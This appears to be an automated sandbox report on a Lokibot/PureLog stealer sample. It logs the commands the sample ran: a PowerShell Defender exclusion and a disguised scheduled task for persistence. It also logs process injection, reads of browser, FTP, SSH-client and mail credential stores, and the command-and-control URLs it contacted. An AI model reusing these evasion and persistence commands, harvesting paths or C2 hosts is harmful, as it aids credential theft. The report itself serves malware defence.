Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory written: C:\Users\user\Desktop\FVR-N2411-07396.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory written: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Queries volume information: C:\Users\user\Desktop\FVR-N2411-07396.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Queries volume information: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FVR-N2411-07396.exe PID: 1496, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.5540000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.ZeJFfrYmOnJKS.exe.28dde98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a65d98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: PopPassword		12_2_0040D069
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: SmtpPassword		12_2_0040D069

Source: Yara match	File source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.5540000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.ZeJFfrYmOnJKS.exe.28dde98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.2a65d98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	11 Deobfuscate/Decode Files or Information	2 Credentials in Registry	23 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FVR-N2411-07396.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
FVR-N2411-07396.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos

Source	Detection	Scanner	Label	Link
http://94.156.177.41/soja/five/fre.php	0%	Avira URL Cloud	safe
94.156.177.41/soja/five/fre.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.41/soja/five/fre.php	true	Avira URL Cloud: safe	unknown
94.156.177.41/soja/five/fre.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FVR-N2411-07396.exe, 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, ZeJFfrYmOnJKS.exe, 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	ZeJFfrYmOnJKS.exe, ZeJFfrYmOnJKS.exe, 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564533
Start date and time:	2024-11-28 13:51:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FVR-N2411-07396.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/13@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 71 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.85.23.206, 4.175.87.197
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: FVR-N2411-07396.exe

Simulations

Behavior and APIs

Time	Type	Description
07:51:56	API Interceptor	63x Sleep call for process: FVR-N2411-07396.exe modified
07:52:01	API Interceptor	17x Sleep call for process: powershell.exe modified
07:52:03	API Interceptor	2x Sleep call for process: ZeJFfrYmOnJKS.exe modified
13:52:02	Task Scheduler	Run new task: ZeJFfrYmOnJKS path: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	5c13e6.msi	Get hash	malicious	AteraAgent	Browse	199.232.214.172
	FACTURE NON PAYEE.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	goHB2EXlPf.exe	Get hash	malicious	RedLine, SectopRAT	Browse	199.232.210.172
	goHB2EXlPf.exe	Get hash	malicious	RedLine, SectopRAT	Browse	199.232.210.172
	9VbeqQbgU4.exe	Get hash	malicious	RedLine, SectopRAT	Browse	199.232.210.172
	chutmarao.ps1	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	fpPn4XBjyk.exe	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	Banco Santander Totta - NOTIFICA#U00c7#U00c3O DE TRANSFER#U00caNCIA ELECTR#U00d3NICA.eml	Get hash	malicious	CredentialStealer	Browse	199.232.214.172
	invoice-1664809283.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	NF---710.msi	Get hash	malicious	AteraAgent	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
